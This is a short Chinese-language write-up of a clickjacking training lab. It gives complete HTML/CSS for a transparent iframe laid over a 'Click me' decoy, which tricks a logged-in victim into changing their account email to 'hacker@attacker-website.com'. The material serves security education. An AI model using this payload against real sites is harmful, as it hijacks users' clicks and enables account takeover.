# Clickjacking Lab2 這題目標是讓受害者（使用 Chrome）以為自己在點「Click me」，實際點擊的是上傳帳號按鈕，進而觸發動作。 一樣先進入網站。  登入題目給的帳密後，可以看到有上傳/刪除 email 選項，但為了讓使用者可以點上傳 email ，我們要在上面覆蓋一個區塊，所以要寫個 HTML。  只要寫一個假的按鈕後，上面再疊一個透明的惡意按鈕，這樣使用者只會看到下層的按鈕，但觸發的效果是上層惡意按鈕的行為。 ```html= <style> iframe { position:relative; width:700px; height: 500px; opacity: 0.00000000000000001; z-index: 2; } div { position:absolute; top:441px; left:54px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a5c00b804ef414980500391003f000c.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe> ``` 然後調數字調到 Click me 的文字在 upload email 上面這題就結束了。  ### Clickjacking Lab3 -> [write up](https://hackmd.io/@mio0813/H1Tld1CNee) ---